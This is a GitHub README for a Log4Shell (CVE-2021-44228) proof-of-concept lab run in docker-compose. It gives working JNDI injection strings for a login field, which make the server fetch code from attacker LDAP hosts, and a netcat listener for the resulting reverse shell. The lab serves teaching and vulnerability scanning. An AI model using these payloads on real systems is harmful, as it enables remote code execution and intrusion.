Log4shell proof of concept

Proof of concept for CVE-2021-44228. To learn more about log4shell, check the summary by Snyk.

To start all containers

docker-compose up

Exploit 1:

Go go localhost:8080 and fill username:

${jndi:ldap://exploit:9999/Evil}

Exploit 2:

${jndi:ldap://reverse-shell:1389/a}

Snyk

snyk log4shell
snyk test --all-projects

Shell 1

Start terminal in web-server

docker-compose up web-server

Shell 2

docker-compose up exploit
docker-compose up reverse-shell

Shell 3

Check web server to see if exploit worked:

docker-compose exec web-server bash

Shell 4

Start terminal in ubuntu and listen for reverse shell:

docker-compose up -d ubuntu
docker-compose exec ubuntu bash
nc -lv 9001

Credit

This PoC is heavily based on these resources:

kozmer/log4j-shell-poc
snyk-labs/java-goof

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Log4shell proof of concept

To start all containers

Exploit 1:

Exploit 2:

Snyk

Shell 1

Shell 2

Shell 3

Shell 4

Credit

Files

README.md

Latest commit

History

README.md

File metadata and controls

Log4shell proof of concept

To start all containers

Exploit 1:

Exploit 2:

Snyk

Shell 1

Shell 2

Shell 3

Shell 4

Credit